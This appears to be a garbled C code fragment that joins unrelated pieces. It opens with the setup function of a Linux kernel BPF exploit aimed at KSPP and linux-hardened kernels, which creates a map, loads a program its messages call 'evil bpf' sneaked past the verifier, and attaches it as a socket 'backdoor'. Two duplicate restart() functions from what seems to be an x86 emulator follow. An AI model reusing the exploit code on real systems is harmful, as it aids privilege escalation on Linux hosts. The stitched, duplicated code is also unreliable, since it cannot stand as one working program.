void
initialize() {
info("\n");
info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
info("\n");
info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
info("\n");
redact("creating bpf map\n");
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
if (mapfd < 0) {
fail("failed to create bpf map: '%s'\n", strerror(errno));
}
redact("sneaking evil bpf past the verifier\n");
progfd = load_prog();
if (progfd < 0) {
if (errno == EACCES) {
msg("log:\n%s", bpf_log_buf);
}
fail("failed to load prog '%s'\n", strerror(errno));
}
redact("creating socketpair()\n");
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
fail("failed to create socket pair '%s'\n", strerror(errno));
}
redact("attaching bpf backdoor to socket\n");
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
fail("setsockopt '%s'\n", strerror(errno));
}
}
void restart()
{
/* Perform some initialization to restart a program */
memcpy(hwa_to_va(LOADER_START), loader, loader_len);
tlb_init();
/* General initialization */
cpu.eip = LOADER_START;
cpu.ebp = 0;
cpu.esp = 0x8000000;
cpu.eflags = 0x2;
cpu.eax = 0;
cpu.ecx = 0;
cpu.edx = 0;
cpu.cr0.paging = 0;
cpu.cr0.protect_enable = 0;
cpu.INTR = 0;
FLAG_CHG(IF, 0);
/* Segment initialization */
cpu.gdtr.limit = 0;
cpu.gdtr.base = 0;
cpu.cr[0] = 0; // Set PE to 0
load_prog();
// trigger = TRIGGER_INIT;
init_dram();
}
void restart() {
/* Perform some initialization to restart a program */
load_prog();
memcpy(hwa_to_va(LOADER_START), loader, loader_len);
cpu.eip = LOADER_START;
cpu.ebp = 0;
cpu.esp = 0x8000000;
cpu.eflags = 2;
init_dram();
init_cache1();
init_cache2();
init_TLB();
/* initialize limit of cs in gdt */
// printf("%x\n",cpu.gdtr.base);
// uint16_t *cs_limit =(void *)(0x90901700 + 64);
// *cs_limit = 0xffff;
seg_cache[1].limit = 0xffffffff;//can't modify memory in 0x90901700
// *cs_limit = 0xffff;//other bits are initialized by 0
}